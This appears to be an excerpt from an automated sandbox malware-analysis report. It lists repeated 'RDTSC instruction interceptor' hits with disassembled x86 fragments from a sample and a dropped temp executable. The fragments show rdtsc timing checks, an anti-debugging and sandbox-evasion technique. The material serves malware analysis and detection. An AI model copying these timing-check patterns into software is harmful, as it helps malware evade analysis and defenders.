Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0167 second address: 00000000004F016D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0188 second address: 00000000004F018E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F018E second address: 00000000004F01B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C686h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F01B3 second address: 00000000004F01B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F01B9 second address: 00000000004F01DA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C681h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F01DA second address: 00000000004F01E0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F01E0 second address: 00000000004F0203 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C683h 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0203 second address: 00000000004F0209 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0209 second address: 00000000004F0226 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0226 second address: 00000000004F022C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F022C second address: 00000000004EFF9F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C38C3C8h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF9F second address: 00000000004EFFA5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFFA5 second address: 00000000004EFFC3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFFC3 second address: 00000000004EFFC9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFFC9 second address: 00000000004EFFE5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFFE5 second address: 00000000004EFFEB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFFEB second address: 00000000004F0007 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0007 second address: 00000000004F000D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F000D second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C684h 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0275 second address: 00000000004F027B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB01 second address: 00000000004EFB07 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB07 second address: 00000000004EFB20 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ah 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB20 second address: 00000000004EFB26 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB26 second address: 00000000004EFB4B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE33h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 004EFE72h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB4B second address: 00000000004EFB51 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB51 second address: 00000000004EFB74 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE35h 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB74 second address: 00000000004EFB7A instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB7A second address: 00000000004EFB9B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB9B second address: 00000000004EFBA1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBA1 second address: 00000000004EFBC1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 004F06A6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBC1 second address: 00000000004EFBC7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBC7 second address: 00000000004EFBEA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE31h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 004EFED6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBEA second address: 00000000004EFBF0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBF0 second address: 00000000004EFEDD instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE32h 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFEDD second address: 00000000004EFEE3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE32h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF03 second address: 00000000004EFF09 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE34h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF31 second address: 00000000004EFF37 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF56 second address: 00000000004EFF5C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C98FED9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F002E second address: 00000000004F0034 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE35h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F108C990039h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0062 second address: 00000000004F0068 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0085 second address: 00000000004F008B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00A5 second address: 00000000004F00AB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00C7 second address: 00000000004F00CD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE32h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00EF second address: 00000000004F00F5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE30h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0116 second address: 00000000004F011C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE36h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0142 second address: 00000000004F0148 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0167 second address: 00000000004F016D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0188 second address: 00000000004F018E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F018E second address: 00000000004F01B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE36h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01B3 second address: 00000000004F01B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01B9 second address: 00000000004F01DA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE31h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01DA second address: 00000000004F01E0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01E0 second address: 00000000004F0203 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE33h 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0203 second address: 00000000004F0209 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0209 second address: 00000000004F0226 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0226 second address: 00000000004F022C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F022C second address: 00000000004EFF9F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Eh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C98FB78h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF9F second address: 00000000004EFFA5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFA5 second address: 00000000004EFFC3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFC3 second address: 00000000004EFFC9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFC9 second address: 00000000004EFFE5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFE5 second address: 00000000004EFFEB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFEB second address: 00000000004F0007 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0007 second address: 00000000004F000D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F000D second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE34h 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0275 second address: 00000000004F027B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB07 second address: 00000000004EFB20 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ah 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB26 second address: 00000000004EFB4B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C683h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 004EFE72h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB51 second address: 00000000004EFB74 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C685h 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
